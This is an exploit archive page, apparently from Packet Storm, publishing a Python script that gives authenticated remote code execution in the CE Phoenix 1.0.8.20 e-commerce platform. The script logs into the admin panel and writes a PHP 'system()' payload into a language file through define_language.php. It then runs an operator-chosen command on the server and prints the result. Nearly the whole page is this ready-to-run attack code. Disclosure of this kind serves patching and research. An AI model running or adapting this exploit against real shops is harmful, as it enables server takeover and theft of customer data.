what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CE Phoenix 1.0.8.20 Remote Code Execution

CE Phoenix 1.0.8.20 Remote Code Execution
Posted Nov 30, 2023
Authored by tmrswrr

CE Phoenix version 1.0.8.20 remote code execution exploit written in Python.

tags | exploit, remote, code execution, python
SHA-256 | 442e8d9deeb16781dd142ed87c294e9454d90653e85fe286945812163a1c322b

CE Phoenix 1.0.8.20 Remote Code Execution

Change Mirror Download
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT :

import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep

class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'


def entry_banner():
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)

banner = color_random[0] + """
CE Phoenix v1.0.8.20 - Remote Code Execution \n
Author: tmrswrr
"""
for char in banner:
print(char, end='')
sys.stdout.flush()
sleep(0.0045)

def get_formid_and_cookies(session, url):
response = session.get(url, allow_redirects=True)
if response.ok:
soup = BeautifulSoup(response.text, 'html.parser')
formid_input = soup.find('input', {'name': 'formid'})
if formid_input:
return formid_input['value'], session.cookies
return None, None

def perform_exploit(session, url, username, password, command):
print("\n[+] Attempting to exploit the target...")


initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
formid, cookies = get_formid_and_cookies(session, initial_url)
if not formid:
print("[-] Failed to retrieve initial formid.")
return

# Login
print("[+] Performing login...")
login_payload = {
'formid': formid,
'username': username,
'password': password
}
login_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': initial_url
}
login_url = url + "/admin/login.php?action=process"
login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

if not login_response.ok:
print("[-] Login failed.")
print(login_response.text)
return

print("[+] Login successful.")


new_formid, _ = get_formid_and_cookies(session, login_response.url)
if not new_formid:
print("[-] Failed to retrieve new formid after login.")
return

# Exploit
print("[+] Executing the exploit...")
encoded_command = urllib.parse.quote_plus(command)
exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
exploit_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': login_response.url
}
exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

if exploit_response.ok:
print("[+] Exploit executed successfully.")
else:
print("[-] Exploit failed.")
print(exploit_response.text)


final_response = session.get(url)
print("\n[+] Executed Command Output:\n")
print(final_response.text)

def main(base_url, username, password, command):
print("\n[+] Starting the exploitation process...")
session = requests.Session()
perform_exploit(session, base_url, username, password, command)

if __name__ == "__main__":
entry_banner()

if len(sys.argv) < 5:
print("Usage: python script.py [URL] [username] [password] [command]")
sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]

main(base_url, username, password, command)
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close